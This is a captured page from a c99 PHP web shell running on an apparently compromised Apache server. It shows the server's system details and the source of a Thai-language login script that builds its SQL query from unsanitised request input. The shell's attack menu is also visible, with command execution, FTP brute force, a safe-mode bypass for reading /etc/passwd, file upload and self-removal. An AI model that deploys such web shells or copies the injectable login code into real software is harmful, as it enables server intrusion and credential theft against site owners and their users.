!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 51.24 GB of 127.8 GB (40.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Checkuser-old.php (2.13 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
        session_start
();
          include(
"./include/FunctionDB.php");
    
ConnectDB();
    
        
   
$Username =  $_REQUEST["Username"];
   
$Password $_REQUEST["Password"];
     if(
$Username && $Password
         {
    
$Password md5($Password);
    
$sql "SELECT * FROM user_tb WHERE (Username ='$Username' AND Password='$Password') AND Flag IN ('0','1')";
    
$result mysql_query($sql) or die(" $result".mysql_error());
    
$row mysql_num_rows($result);
    
$rs mysql_fetch_array($result);
    
$Priority $rs["Priority"];
   
$_SESSION['valid_user'] = $Username;
    
$_SESSION['priority'] = $priority;
    
$_SESSION['password'] = $Password;
       if( 
$row )
              {
         
                     
?>
                   <body bgcolor="#"><br>
                   <center> <font face="Tohama" size="5" color="#FF0000">ชื่อผู้ใช้ หรือ รหัสผ่าน ไม่ถูกต้อง  กรุณากรอกใหม่ค่ะ</font>
                   </center>
                   <!--<meta http-equiv="refresh" content="3;URL=login.php">-->
                    <meta http-equiv="refresh" content="1;URL=login.php">
                 <!--  <meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
                  <link href="./source/style.css" rel="stylesheet" type="text/css">-->
                  
                  <?php
            
}
         else
            {
             
              
$sql "SELECT * FROM permission_tb WHERE permision='$Priority' ";
              
$result2 mysql_query($sql) or die(" $result".mysql_error());
              
$rss mysql_fetch_array($result2);
              
session_register("valid_user");
              
session_register("password") ;
              
session_register("Priority") ;
               
$goto $rss["url"];
             
//  header("$goto");
            //header("Location: $goto");
         
           
echo "<meta http-equiv=\"refresh\" content=\"0;URL=$goto\">";
             }
     }
     else
        {
            
?>
              <br>
              <center> <font face="Tohama" size="5" color="#FF0000">กรุณากรอก ชื่อผู้ใช้ และรหัสผ่าน ก่อนเข้าระบบค่ะ </font>
              </center><br>
          <!--  <meta http-equiv="refresh" content="3;URL=login.php">-->
             <meta http-equiv="refresh" content="1;URL=login.php">
            </body>
            <?php
          
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.018 ]--